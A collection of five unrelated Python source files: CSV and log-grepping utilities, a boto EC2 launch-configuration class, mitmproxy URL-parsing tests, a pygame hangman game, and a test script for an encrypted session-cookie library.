# ===== a-e/csvsee :: csvsee/utils.py (license: mit) =====
# utils.py
"""Shared utility functions for the csvsee library.
"""
import csv
import re
import sys
from datetime import datetime, timedelta
from csvsee import dates
class NoMatch (Exception):
"""Exception raised when no column name matches a given expression."""
pass
def float_or_0(value):
"""Try to convert ``value`` to a floating-point number. If
conversion fails, return ``0``.
Examples::
>>> float_or_0(5)
5.0
>>> float_or_0('5')
5.0
>>> float_or_0('five')
0
"""
try:
return float(value)
except ValueError:
return 0
def column_names(csv_file):
"""Return a list of column names in the given ``.csv`` file.
"""
reader = csv.DictReader(open(csv_file, 'r'))
return reader.fieldnames
def strip_prefix(strings):
"""Strip a common prefix from a sequence of strings.
Return ``(prefix, [stripped])`` where ``prefix`` is the string that is
common (with leading and trailing whitespace removed), and ``[stripped]``
is all strings with the prefix removed.
Examples::
>>> strip_prefix(['first', 'fourth', 'fifth'])
('f', ['irst', 'ourth', 'ifth'])
>>> strip_prefix(['spam and eggs', 'spam and potatoes', 'spam and spam'])
('spam and', ['eggs', 'potatoes', 'spam'])
"""
prefix = ''
# Group all first letters, then all second letters, etc.
# letters list will be the same length as the shortest string
for letters in zip(*strings):
# If all letters are the same, append to common prefix
if len(set(letters)) == 1:
prefix += letters[0]
else:
break
# Keep everything after the index where the strings diverge
index = len(prefix)
stripped = [s[index:] for s in strings]
return (prefix.strip(), stripped)
def grep_files(filenames, matches, dateformat='guess', resolution=60,
show_progress=True):
"""Search all the given files for matching text, and return a list of
``(timestamp, counts)`` for each match, where ``timestamp`` is a
``datetime``, and ``counts`` is a dictionary of ``{match: count}``,
counting the number of times each match was found during intervals of
``resolution`` seconds.
"""
# Counts of each match, used as a template for each row
row_temp = [(match, 0) for match in matches]
rows = {}
# Compile regular expressions for matches
# (Shaves off a little bit of execution time)
compiled_matches = [re.compile(expr) for expr in matches]
# Read each line of each file
for filename in filenames:
# Show progress bar?
if show_progress:
num_lines = line_count(filename)
progress = ProgressBar(num_lines, prefix=filename, units='lines')
# No progress bar, just print the filename being read
else:
print("Reading %s" % filename)
# Guess date format?
if not dateformat or dateformat == 'guess':
dateformat = dates.guess_file_date_format(filename)
# HACK: Fake timestamp in case no real timestamps are ever found
timestamp = datetime(1970, 1, 1)
# What line number are we on?
line_num = 0
for line in open(filename, 'r'):
line_num += 1
# Update progress bar every 1000 lines
if show_progress:
if line_num % 1000 == 0 or line_num == num_lines:
progress.update(line_num)
sys.stdout.write('\r' + str(progress))
sys.stdout.flush()
# Remove leading/trailing whitespace and newlines
line = line.strip()
# If line is empty, skip it
if not line:
continue
# See if this line has a timestamp
try:
line_timestamp = dates.date_chop(line, dateformat, resolution)
# No timestamp found, stick with the current one
except dates.CannotParse:
pass
# New timestamp found, switch to it
else:
timestamp = line_timestamp
# If this datestamp hasn't appeared before, add it
if timestamp not in rows:
rows[timestamp] = dict(row_temp)
# Count the number of each match in this line
for expr in compiled_matches:
if expr.search(line):
rows[timestamp][expr.pattern] += 1
# If using progress bar, print a newline
if show_progress:
sys.stdout.write('\n')
    # Return a sorted list of (timestamp, {counts}) tuples
    return sorted(rows.items())
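# Hedged usage sketch (added for illustration; not part of the original
# csvsee source): counts ERROR/WARN hits per 60-second bucket across two
# hypothetical log files.
def _example_grep_files():
    results = grep_files(['app1.log', 'app2.log'], ['ERROR', 'WARN'],
                         dateformat='guess', resolution=60,
                         show_progress=False)
    for timestamp, counts in results:
        print("%s: %d errors, %d warnings"
              % (timestamp, counts['ERROR'], counts['WARN']))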
def top_by(func, count, y_columns, y_values, drop=0):
"""Apply ``func`` to each column, and return the top ``count`` column
names. Arguments:
func
A function that takes a list of values and returns a single value.
`max`, `min`, and average are good examples.
count
How many of the "top" values to keep
y_columns
A list of candidate column names. All of these must
exist as keys in ``y_values``
y_values
Dictionary of ``{column: values}`` for each y-column. Must have
data for each column in ``y_columns`` (any extra column data will
be ignored).
drop
How many top values to skip before returning the next
``count`` top columns
"""
# List of (func(ys), y_name)
results = []
for y_name in y_columns:
f_ys = func(y_values[y_name])
results.append((f_ys, y_name))
# Keep the top ``count`` after dropping ``drop`` values
sorted_columns = [y_name for (f_ys, y_name) in reversed(sorted(results))]
return sorted_columns[drop:drop + count]
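# Illustrative sketch (added; not in the original module): rank columns by
# their peak value and keep the top two.
def _example_top_by():
    y_values = {'a': [1, 9, 2], 'b': [4, 4, 4], 'c': [0, 1, 0]}
    # max() ranks by peak value, so this returns ['a', 'b']
    return top_by(max, 2, ['a', 'b', 'c'], y_values)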
def top_by_average(count, y_columns, y_values, drop=0):
"""Determine the top ``count`` columns based on the average of values
in ``y_values``, and return the filtered ``y_columns`` names.
"""
def avg(values):
return float(sum(values)) / len(values)
return top_by(avg, count, y_columns, y_values, drop)
def top_by_peak(count, y_columns, y_values, drop=0):
"""Determine the top ``count`` columns based on the peak value
in ``y_values``, and return the filtered ``y_columns`` names.
"""
return top_by(max, count, y_columns, y_values, drop)
def matching_fields(expr, fields):
"""Return all ``fields`` that match a regular expression ``expr``,
or raise a `NoMatch` exception if no matches are found.
Examples::
>>> matching_fields('a.*', ['apple', 'banana', 'avocado'])
['apple', 'avocado']
>>> matching_fields('a.*', ['peach', 'grape', 'kiwi'])
Traceback (most recent call last):
NoMatch: No matching column found for 'a.*'
"""
    # Do backslash-escape of expressions (decode back to str for re.match)
    expr = expr.encode('unicode_escape').decode('ascii')
# Find matching fields
matches = [field for field in fields if re.match(expr, field)]
# Return matches or raise a NoMatch exception
if matches:
return matches
else:
raise NoMatch("No matching column found for '%s'" % expr)
def matching_xy_fields(x_expr, y_exprs, fieldnames, verbose=False):
"""Match ``x_expr`` and ``y_exprs`` to all available column names in
``fieldnames``, and return the matched ``x_column`` and ``y_columns``.
Example::
>>> matching_xy_fields('x.*', ['y[12]', 'y[ab]'],
... ['xxx', 'y1', 'y2', 'y3', 'ya', 'yb', 'yc'])
('xxx', ['y1', 'y2', 'ya', 'yb'])
If ``x_expr`` is empty, the first column name is used::
>>> matching_xy_fields('', ['y[12]', 'y[ab]'],
... ['xxx', 'y1', 'y2', 'y3', 'ya', 'yb', 'yc'])
('xxx', ['y1', 'y2', 'ya', 'yb'])
If no match is found for any expression in ``y_exprs``, a `NoMatch`
exception is raised::
>>> matching_xy_fields('', ['y[12]', 'y[jk]'],
... ['xxx', 'y1', 'y2', 'y3', 'ya', 'yb', 'yc'])
Traceback (most recent call last):
NoMatch: No matching column found for 'y[jk]'
"""
# Make a copy of fieldnames
fieldnames = [field for field in fieldnames]
# If x_expr is provided, match on that.
if x_expr:
x_column = matching_fields(x_expr, fieldnames)[0]
# Otherwise, just take the first field.
else:
x_column = fieldnames[0]
#print("X-expression: '%s' matched column '%s'" % (x_expr, x_column))
# In any case, remove the x column from fieldnames so it
# won't be matched by any y-expression.
fieldnames.remove(x_column)
# Get all matching Y columns
y_columns = []
for y_expr in y_exprs:
matches = matching_fields(y_expr, fieldnames)
y_columns.extend(matches)
#print("Y-expression: '%s' matched these columns:" % y_expr)
#print('\n'.join(matches))
return (x_column, y_columns)
def read_xy_values(reader, x_column, y_columns,
date_format='', gmt_offset=0, zero_time=False):
"""Read values from a `csv.DictReader`, and return ``(x_values,
y_values)``. where ``x_values`` is a list of values found in ``x_column``,
and ``y_values`` is a dictionary of ``{y_column: [values]}`` for each
column in ``y_columns``.
Arguments:
x_column
Name of the column you want to use as the X axis.
y_columns
Names of columns you want to plot on the Y axis.
date_format
If given, treat values in ``x_column`` as timestamps
with the given format string.
gmt_offset
Add this many hours to every timestamp.
Only useful with ``date_format``.
zero_time
If ``True``, adjust timestamps so the earliest one starts at
``00:00`` (midnight). Only useful with ``date_format``.
"""
x_values = []
y_values = {}
for row in reader:
x_value = row[x_column]
# If X is supposed to be a date, try to convert it
try:
# FIXME: This could do weird things if the x-values
# are sometimes parseable as dates, and sometimes not
x_value = datetime.strptime(x_value, date_format) + \
timedelta(hours=gmt_offset)
# Otherwise, assume it's a floating-point numeric value
except ValueError:
x_value = float_or_0(x_value)
x_values.append(x_value)
# Append Y values from each column
for y_col in y_columns:
if y_col not in y_values:
y_values[y_col] = []
y_values[y_col].append(float_or_0(row[y_col]))
# Adjust datestamps to start at 0:00?
if date_format and zero_time:
z = min(x_values)
hms = timedelta(hours=z.hour, minutes=z.minute, seconds=z.second)
x_values = [x - hms for x in x_values]
return (x_values, y_values)
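# Hedged example (added for illustration): reading timestamped CSV data.
# The file name, column patterns and date format are hypothetical.
def _example_read_xy_values():
    reader = csv.DictReader(open('metrics.csv', 'r'))
    x_column, y_columns = matching_xy_fields('time.*', ['cpu.*'],
                                             reader.fieldnames)
    return read_xy_values(reader, x_column, y_columns,
                          date_format='%Y-%m-%d %H:%M:%S', zero_time=True)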
def line_count(filename):
"""Return the total number of lines in the given file.
"""
# Not terribly efficient but easy and good enough for now
return sum(1 for line in open(filename))
class ProgressBar:
"""An ASCII command-line progress bar with percentage.
Adapted from Corey Goldberg's version:
http://code.google.com/p/corey-projects/source/browse/trunk/python2/progress_bar.py
"""
def __init__(self, end, prefix='', fill='=', units='secs', width=40):
"""Create a progress bar with the given attributes.
"""
self.end = end
self.prog_bar = '[]'
self.prefix = prefix
self.fill = fill
self.units = units
self.width = width
self._update_amount(0)
def _update_amount(self, new_amount):
"""Update the progress bar with the percentage of completion.
"""
percent_done = int(round((new_amount / 100.0) * 100.0))
all_full = self.width - 2
num_hashes = int(round((percent_done / 100.0) * all_full))
self.prog_bar = '[' + self.fill * num_hashes + ' ' * (all_full - num_hashes) + ']'
        pct_place = (len(self.prog_bar) // 2) - len(str(percent_done))
pct_string = '%i%%' % percent_done
self.prog_bar = self.prog_bar[0:pct_place] + \
(pct_string + self.prog_bar[pct_place + len(pct_string):])
def update(self, current):
"""Set the current progress.
"""
self._update_amount((current / float(self.end)) * 100.0)
self.prog_bar += ' %d/%d %s' % (current, self.end, self.units)
def __str__(self):
"""Return the progress bar as a string.
"""
return str(self.prefix + ' ' + self.prog_bar)
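# Minimal usage sketch for ProgressBar (added; not in the original source).
def _example_progress_bar():
    progress = ProgressBar(200, prefix='demo', units='lines')
    for i in range(1, 201):
        progress.update(i)
        sys.stdout.write('\r' + str(progress))
        sys.stdout.flush()
    sys.stdout.write('\n')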
def filter_csv(csv_infile, csv_outfile, columns, match='regexp', action='include'):
"""Filter ``csv_infile`` and write output to ``csv_outfile``.
columns
A list of regular expressions or exact column names
match
``regexp`` to treat each value in ``columns`` as a regular
expression, ``exact`` to match exact literal column names
action
``include`` to keep the specified ``columns``, or ``exclude``
to keep all columns *except* the specified ``columns``
"""
# TODO: Factor out a 'filter_columns' function
reader = csv.DictReader(open(csv_infile))
# Do regular-expression matching of column names?
if match == 'regexp':
matching_columns = []
for expr in columns:
# TODO: What if more than one expression matches a column?
# Find a way to avoid duplicates.
matching_columns += matching_fields(expr, reader.fieldnames)
# Exact matching of column names
else:
matching_columns = columns
# Include or exclude?
if action == 'include':
keep_columns = matching_columns
else:
keep_columns = [col for col in reader.fieldnames
if col not in matching_columns]
# Create writer for the columns we're keeping; ignore any extra columns
# passed to the writerow() method.
writer = csv.DictWriter(open(csv_outfile, 'w'), keep_columns,
extrasaction='ignore')
# Write the header (csv.DictWriter doesn't do this for us)
writer.writerow(dict(zip(keep_columns, keep_columns)))
for row in reader:
writer.writerow(row)
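# Hedged example (added): keep only the timestamp column plus any latency
# columns. File names and column patterns are hypothetical.
def _example_filter_csv():
    filter_csv('input.csv', 'output.csv', ['timestamp', 'latency.*'],
               match='regexp', action='include')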
def boring_columns(csvfile):
"""Return a list of column names in ``csvfile`` that are "boring"--that is,
the data in them is always the same.
"""
# TODO: Consider columns that never deviate much (less than 1%, say)
# to be boring also
reader = csv.DictReader(open(csvfile))
# Assume all columns are boring until they prove to be interesting
boring = list(reader.fieldnames)
# Remember the first value from each column
    prev = next(reader)
for row in reader:
# Check boring columns to see if they have become interesting yet
# (make a copy to prevent problems with popping while iterating)
for col in list(boring):
# If previous value was empty, set prev to current
# (this handles the case where a column is empty for a while,
# then gets a value later). This is not inherently interesting.
if not prev[col].strip():
prev[col] = row[col]
# If the current value is non-empty, and different from the
# previous, then it's interesting
elif row[col].strip() and row[col] != prev[col]:
boring.remove(col)
# Return names of all columns that never became interesting
return boring
# ===== serviceagility/boto :: boto/ec2/autoscale/launchconfig.py (license: mit) =====
# Copyright (c) 2009 Reza Lotun http://reza.lotun.name/
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from boto.ec2.elb.listelement import ListElement
# Namespacing issue with deprecated local class
from boto.ec2.blockdevicemapping import BlockDeviceMapping as BDM
from boto.resultset import ResultSet
import boto.utils
import base64
# this should use the corresponding object from boto.ec2
# Currently in use by deprecated local BlockDeviceMapping class
class Ebs(object):
def __init__(self, connection=None, snapshot_id=None, volume_size=None):
self.connection = connection
self.snapshot_id = snapshot_id
self.volume_size = volume_size
def __repr__(self):
return 'Ebs(%s, %s)' % (self.snapshot_id, self.volume_size)
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'SnapshotId':
self.snapshot_id = value
elif name == 'VolumeSize':
self.volume_size = value
class InstanceMonitoring(object):
def __init__(self, connection=None, enabled='false'):
self.connection = connection
self.enabled = enabled
def __repr__(self):
return 'InstanceMonitoring(%s)' % self.enabled
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'Enabled':
self.enabled = value
# this should use the BlockDeviceMapping from boto.ec2.blockdevicemapping
# Currently in use by deprecated code for backwards compatibility
# Removing this class can also remove the Ebs class in this same file
class BlockDeviceMapping(object):
def __init__(self, connection=None, device_name=None, virtual_name=None,
ebs=None, no_device=None):
self.connection = connection
self.device_name = device_name
self.virtual_name = virtual_name
self.ebs = ebs
self.no_device = no_device
def __repr__(self):
return 'BlockDeviceMapping(%s, %s)' % (self.device_name,
self.virtual_name)
def startElement(self, name, attrs, connection):
if name == 'Ebs':
self.ebs = Ebs(self)
return self.ebs
def endElement(self, name, value, connection):
if name == 'DeviceName':
self.device_name = value
elif name == 'VirtualName':
self.virtual_name = value
elif name == 'NoDevice':
self.no_device = bool(value)
class LaunchConfiguration(object):
def __init__(self, connection=None, name=None, image_id=None,
key_name=None, security_groups=None, user_data=None,
instance_type='m1.small', kernel_id=None,
ramdisk_id=None, block_device_mappings=None,
instance_monitoring=False, spot_price=None,
instance_profile_name=None, ebs_optimized=False,
associate_public_ip_address=None, volume_type=None,
delete_on_termination=True, iops=None, use_block_device_types=False):
"""
A launch configuration.
:type name: str
:param name: Name of the launch configuration to create.
:type image_id: str
:param image_id: Unique ID of the Amazon Machine Image (AMI) which was
assigned during registration.
:type key_name: str
:param key_name: The name of the EC2 key pair.
:type security_groups: list
:param security_groups: Names or security group id's of the security
groups with which to associate the EC2 instances or VPC instances,
respectively.
:type user_data: str
:param user_data: The user data available to launched EC2 instances.
:type instance_type: str
:param instance_type: The instance type
:type kernel_id: str
:param kernel_id: Kernel id for instance
:type ramdisk_id: str
:param ramdisk_id: RAM disk id for instance
:type block_device_mappings: list
:param block_device_mappings: Specifies how block devices are exposed
for instances
:type instance_monitoring: bool
:param instance_monitoring: Whether instances in group are launched
with detailed monitoring.
:type spot_price: float
:param spot_price: The spot price you are bidding. Only applies
if you are building an autoscaling group with spot instances.
:type instance_profile_name: string
:param instance_profile_name: The name or the Amazon Resource
Name (ARN) of the instance profile associated with the IAM
role for the instance.
:type ebs_optimized: bool
:param ebs_optimized: Specifies whether the instance is optimized
for EBS I/O (true) or not (false).
:type associate_public_ip_address: bool
:param associate_public_ip_address: Used for Auto Scaling groups that launch instances into an Amazon Virtual Private Cloud.
Specifies whether to assign a public IP address to each instance launched in a Amazon VPC.
:type volume_type: str
:param volume_type: The type of the volume.
Valid values are: standard | io1 | gp2.
:type delete_on_termination: bool
:param delete_on_termination: Whether the device will be deleted
when the instance is terminated.
:type iops: int
:param iops: The provisioned IOPs you want to associate with this volume.
:type use_block_device_types: bool
:param use_block_device_types: Specifies whether to return
described Launch Configs with block device mappings containing.
"""
self.connection = connection
self.name = name
self.instance_type = instance_type
self.block_device_mappings = block_device_mappings
self.key_name = key_name
sec_groups = security_groups or []
self.security_groups = ListElement(sec_groups)
self.image_id = image_id
self.ramdisk_id = ramdisk_id
self.created_time = None
self.kernel_id = kernel_id
self.user_data = user_data
self.created_time = None
self.instance_monitoring = instance_monitoring
self.spot_price = spot_price
self.instance_profile_name = instance_profile_name
self.launch_configuration_arn = None
self.ebs_optimized = ebs_optimized
self.associate_public_ip_address = associate_public_ip_address
self.volume_type = volume_type
self.delete_on_termination = delete_on_termination
self.iops = iops
self.use_block_device_types = use_block_device_types
if connection is not None:
self.use_block_device_types = connection.use_block_device_types
def __repr__(self):
return 'LaunchConfiguration:%s' % self.name
def startElement(self, name, attrs, connection):
if name == 'SecurityGroups':
return self.security_groups
elif name == 'BlockDeviceMappings':
if self.use_block_device_types:
self.block_device_mappings = BDM()
else:
self.block_device_mappings = ResultSet([('member', BlockDeviceMapping)])
return self.block_device_mappings
elif name == 'InstanceMonitoring':
self.instance_monitoring = InstanceMonitoring(self)
return self.instance_monitoring
def endElement(self, name, value, connection):
if name == 'InstanceType':
self.instance_type = value
elif name == 'LaunchConfigurationName':
self.name = value
elif name == 'KeyName':
self.key_name = value
elif name == 'ImageId':
self.image_id = value
elif name == 'CreatedTime':
self.created_time = boto.utils.parse_ts(value)
elif name == 'KernelId':
self.kernel_id = value
elif name == 'RamdiskId':
self.ramdisk_id = value
elif name == 'UserData':
try:
self.user_data = base64.b64decode(value)
except TypeError:
self.user_data = value
elif name == 'LaunchConfigurationARN':
self.launch_configuration_arn = value
elif name == 'InstanceMonitoring':
self.instance_monitoring = value
elif name == 'SpotPrice':
self.spot_price = float(value)
elif name == 'IamInstanceProfile':
self.instance_profile_name = value
elif name == 'EbsOptimized':
self.ebs_optimized = True if value.lower() == 'true' else False
elif name == 'AssociatePublicIpAddress':
self.associate_public_ip_address = True if value.lower() == 'true' else False
elif name == 'VolumeType':
self.volume_type = value
elif name == 'DeleteOnTermination':
if value.lower() == 'true':
self.delete_on_termination = True
else:
self.delete_on_termination = False
elif name == 'Iops':
self.iops = int(value)
else:
setattr(self, name, value)
def delete(self):
""" Delete this launch configuration. """
return self.connection.delete_launch_configuration(self.name)
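# Hedged usage sketch (added; not part of this module): creating a launch
# configuration through boto's autoscale connection. The region, AMI id, key
# name and security group are placeholders.
def _example_create_launch_configuration():
    import boto.ec2.autoscale
    conn = boto.ec2.autoscale.connect_to_region('us-east-1')
    lc = LaunchConfiguration(name='web-lc', image_id='ami-12345678',
                             key_name='my-key', instance_type='m1.small',
                             security_groups=['webserver'])
    # register the configuration with the Auto Scaling service
    conn.create_launch_configuration(lc)
    return lc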
# ===== dwfreed/mitmproxy :: test/mitmproxy/net/http/test_url.py (license: mit) =====
import pytest
import sys
from mitmproxy.test import tutils
from mitmproxy.net.http import url
def test_parse():
with tutils.raises(ValueError):
url.parse("")
s, h, po, pa = url.parse(b"http://foo.com:8888/test")
assert s == b"http"
assert h == b"foo.com"
assert po == 8888
assert pa == b"/test"
s, h, po, pa = url.parse("http://foo/bar")
assert s == b"http"
assert h == b"foo"
assert po == 80
assert pa == b"/bar"
s, h, po, pa = url.parse(b"http://user:pass@foo/bar")
assert s == b"http"
assert h == b"foo"
assert po == 80
assert pa == b"/bar"
s, h, po, pa = url.parse(b"http://foo")
assert pa == b"/"
s, h, po, pa = url.parse(b"https://foo")
assert po == 443
with tutils.raises(ValueError):
url.parse(b"https://foo:bar")
# Invalid IDNA
with tutils.raises(ValueError):
url.parse("http://\xfafoo")
# Invalid PATH
with tutils.raises(ValueError):
url.parse("http:/\xc6/localhost:56121")
# Null byte in host
with tutils.raises(ValueError):
url.parse("http://foo\0")
# Invalid IPv6 URL - see http://www.ietf.org/rfc/rfc2732.txt
with tutils.raises(ValueError):
url.parse('http://lo[calhost')
@pytest.mark.skipif(sys.version_info < (3, 6), reason='requires Python 3.6 or higher')
def test_parse_port_range():
# Port out of range
with tutils.raises(ValueError):
url.parse("http://foo:999999")
def test_unparse():
assert url.unparse("http", "foo.com", 99, "") == "http://foo.com:99"
assert url.unparse("http", "foo.com", 80, "/bar") == "http://foo.com/bar"
assert url.unparse("https", "foo.com", 80, "") == "https://foo.com:80"
assert url.unparse("https", "foo.com", 443, "") == "https://foo.com"
surrogates = bytes(range(256)).decode("utf8", "surrogateescape")
surrogates_quoted = (
'%00%01%02%03%04%05%06%07%08%09%0A%0B%0C%0D%0E%0F'
'%10%11%12%13%14%15%16%17%18%19%1A%1B%1C%1D%1E%1F'
'%20%21%22%23%24%25%26%27%28%29%2A%2B%2C-./'
'0123456789%3A%3B%3C%3D%3E%3F'
'%40ABCDEFGHIJKLMNO'
'PQRSTUVWXYZ%5B%5C%5D%5E_'
'%60abcdefghijklmno'
'pqrstuvwxyz%7B%7C%7D%7E%7F'
'%80%81%82%83%84%85%86%87%88%89%8A%8B%8C%8D%8E%8F'
'%90%91%92%93%94%95%96%97%98%99%9A%9B%9C%9D%9E%9F'
'%A0%A1%A2%A3%A4%A5%A6%A7%A8%A9%AA%AB%AC%AD%AE%AF'
'%B0%B1%B2%B3%B4%B5%B6%B7%B8%B9%BA%BB%BC%BD%BE%BF'
'%C0%C1%C2%C3%C4%C5%C6%C7%C8%C9%CA%CB%CC%CD%CE%CF'
'%D0%D1%D2%D3%D4%D5%D6%D7%D8%D9%DA%DB%DC%DD%DE%DF'
'%E0%E1%E2%E3%E4%E5%E6%E7%E8%E9%EA%EB%EC%ED%EE%EF'
'%F0%F1%F2%F3%F4%F5%F6%F7%F8%F9%FA%FB%FC%FD%FE%FF'
)
def test_encode():
assert url.encode([('foo', 'bar')])
assert url.encode([('foo', surrogates)])
def test_decode():
s = "one=two&three=four"
assert len(url.decode(s)) == 2
assert url.decode(surrogates)
def test_quote():
assert url.quote("foo") == "foo"
assert url.quote("foo bar") == "foo%20bar"
assert url.quote(surrogates) == surrogates_quoted
def test_unquote():
assert url.unquote("foo") == "foo"
assert url.unquote("foo%20bar") == "foo bar"
assert url.unquote(surrogates_quoted) == surrogates
# ===== jobli/24 :: hour21_hangman.py (license: gpl-3.0) =====
import pygame
import sys
from random import choice
from pygame.locals import *
RED = (255, 0, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
YELLOW = (255, 255, 0)
ORANGE = (255, 100, 0)
PURPLE = (100, 0, 255)
def get_words():
f = open("words.txt")
temp = f.readlines()
words = []
for word in temp:
words.append(word.strip())
return words
def draw_gallows(screen):
pygame.draw.rect(screen, PURPLE, (450, 350, 100, 10)) #bottom
pygame.draw.rect(screen, PURPLE, (495, 250, 10, 100)) #support
pygame.draw.rect(screen, PURPLE, (450, 250, 50, 10)) #crossbar
pygame.draw.rect(screen, PURPLE, (450, 250, 10, 25)) #noose
def draw_man(screen, body_part):
if body_part == "head":
pygame.draw.circle(screen, RED, (455, 270), 10) #head
if body_part == "body":
pygame.draw.line(screen, RED, (455, 280), (455, 320), 3) #body
if body_part == "l_arm":
pygame.draw.line(screen, RED, (455, 300), (445, 285), 3) #arm
if body_part == "r_arm":
pygame.draw.line(screen, RED, (455, 300), (465, 285), 3) #arm
if body_part == "l_leg":
pygame.draw.line(screen, RED, (455, 320), (445, 330), 3) #leg
if body_part == "r_leg":
pygame.draw.line(screen, RED, (455, 320), (465, 330), 3) #leg
def draw_word(screen, spaces):
x = 10
for i in range(spaces):
pygame.draw.line(screen, YELLOW, (x, 350), (x+20, 350), 3)
x += 30
def draw_letter(screen, font, word, guess):
x = 10
for letter in word:
if letter == guess:
letter = font.render(letter, 3, (255,255,255))
screen.blit(letter, (x, 300))
x += 30
def main():
pygame.init()
screen = pygame.display.set_mode((600,400))
font = pygame.font.SysFont("monospace", 30)
draw_gallows(screen)
    # the figure is drawn piece by piece by draw_man() as wrong guesses come in
words = get_words()
word = choice(words)
draw_word(screen, len(word))
pygame.display.update()
body = ["r_leg", "l_leg", "r_arm", "l_arm", "body", "head"]
while body:
for event in pygame.event.get():
if event.type == QUIT:
sys.exit()
if event.type == KEYDOWN:
if event.unicode.isalpha():
guess = event.unicode
if guess in word:
draw_letter(screen, font, word, guess)
text = font.render("Grattis !", 1, (0, 255, 0))
screen.blit(text, (40, 40))
pygame.display.update()
else:
body_part = body.pop()
draw_man(screen, body_part)
text = font.render("Synd....", 1, (0, 255, 0))
screen.blit(text, (80, 80))
pygame.display.update()
if __name__ == '__main__':
main()
# ===== PC-fit-Christian-Rupp/Crypt-Cookie :: python/saltedSessionIDTest.py (license: mit) =====
import ccookie
import os
import hashlib
import sys
from time import sleep
import datetime
from Crypto.Cipher import AES
from Crypto.Random import random
from Crypto import Random
from random import SystemRandom
import string
os.environ['SERVER_NAME']='Test Server Name'
os.environ['REMOTE_ADDR']='255.255.255.255'
print('--------------------------------------------------------------------------------')
print('Test with salted Session ID\n')
print('Set enviroment variables!\n')
print('Server name set to "'+ os.environ['SERVER_NAME']+'" for the test routine!')
print('Remote address set to "' +os.environ['REMOTE_ADDR'] +'" for the test routine!\n')
print('Set enviroment variables!\t\t\t\t\t\tFINISHED')
print('-------------------------------------------------------------------------------')
print('Generate test crypt cookie!\n')
oCookie = ccookie.ccookie(complexSessionID = True, salt = 'zero.conf 1970')
print('Generate test crypt cookie!\t\t\t\t\t\tFINISHED')
print('--------------------------------------------------------------------------------')
print('Test session data!\n')
oCookie.createSession()
print('Session:\t' + oCookie.getSessionID())
print('Domain:\t\t' + oCookie._ccookie__cookie['session']['domain'])
print('Path:\t\t' + oCookie._ccookie__cookie['session']['path'])
print('Expires:\t' + oCookie._ccookie__cookie['session']['expires'])
print('Encrypted IP:\t'+ oCookie._ccookie__cookie[str(oCookie._ccookie__toInt(oCookie._ccookie__encrypt('IP')))].value+'\n')
print('Test session data!\t\t\t\t\t\t\tFINISHED')
print('--------------------------------------------------------------------------------')
print('Validation and expiration test!\n')
if oCookie.isValid():
print('Validation test!\t\t\t\t\t\t\tFINISHED')
else:
print('Validation test!\t\t\t\t\t\t\tFAILED')
sys.exit(0)
if oCookie.isExpired():
print('Expiration test!\t\t\t\t\t\t\tFAILED')
sys.exit(0)
else:
print('Expiration test!\t\t\t\t\t\t\tFINISHED')
print('--------------------------------------------------------------------------------')
usr='Mad Max'
pwd='Donnerkupel'
print('Login data test!\n')
print('Testdata:')
print('\tUser name:\t'+usr)
print('\tPassword:\t'+pwd+'\n')
oCookie.login(usr, pwd)
if not(oCookie.getUser()==usr):
print(oCookie.getUser()+' is not the correct user name!\t\t\t\t\tFAILED')
sys.exit(0)
else:
print(oCookie.getUser()+' is the correct user name!\t\t\t\t\tSUCCESS')
if not(oCookie.getPassword()==pwd):
print(oCookie.getPassword()+' is not the correct password!\t\t\t\t\tFAILED')
sys.exit(0)
else:
print(oCookie.getPassword()+' is the correct password!\t\t\t\t\tSUCCESS')
print('Login data test!\t\t\t\t\t\t\tFINISHED')
print('--------------------------------------------------------------------------------')
print('Check key value funktions!\n')
print('Testdata:')
key = 'Auto'
value = 'Porsche'
print('\tKey:\t'+key)
print('\tValue:\t'+value+'\n')
oCookie.addValue(key, value)
print('Key and value added!\t\t\t\t\t\t\tSUCCESS')
if oCookie.hasKey(key)==1:
print('hasKey!\t\t\t\t\t\t\t\t\tSUCCESS')
else:
print('hasKey!\t\t\t\t\t\t\t\t\tFAILED')
sys.exit(0)
if oCookie.getValue(key)==value:
print(oCookie.getValue(key)+' is the correct value!\t\t\t\t\t\tSUCCESS')
else:
print(oCookie.getValue(key)+' is not the correct value!\t\t\t\t\t\tFAILED')
sys.exit(0)
oCookie.deleteValue(key)
print('Value deleted!\t\t\t\t\t\t\t\tSUCCESS')
print('Check key value functions!\t\t\t\t\t\tFINISHED')
print('--------------------------------------------------------------------------------')
print('Test crypt cookie with update expiration!\n')
oCookie = ccookie.ccookie(updateExpiration = True)
oCookie.createSession()
strExpiration = oCookie._ccookie__cookie['session']['expires']
sleep(5)
oCookie.login(usr, pwd)
if strExpiration != oCookie._ccookie__cookie['session']['expires']:
print('Update expiration is working!\t\t\t\t\t\tSUCCESS')
else:
print('Update expiration is not working!\t\t\t\t\tFAILED')
sys.exit(0)
print('Test of update expiration!\t\t\t\t\t\tFINISHED')
print('--------------------------------------------------------------------------------')
print('Test for different expiration times!\n')
oCookie = ccookie.ccookie()
oCookie.createSession()
strExpectedExpiration = (datetime.datetime.utcnow() + datetime.timedelta(minutes=15)).strftime("%a, %d-%b-%Y %H:%M:%S UTC")
if strExpectedExpiration == oCookie._ccookie__cookie['session']['expires']:
print('Default setting with expiration of 15 minutes is working!\t\tSUCCESS')
else:
print('Default setting with expiration of 15 minutes is not working!\t\tFAILED')
sys.exit(0)
oCookie = ccookie.ccookie(timedeltaMinutes = None)
oCookie.createSession()
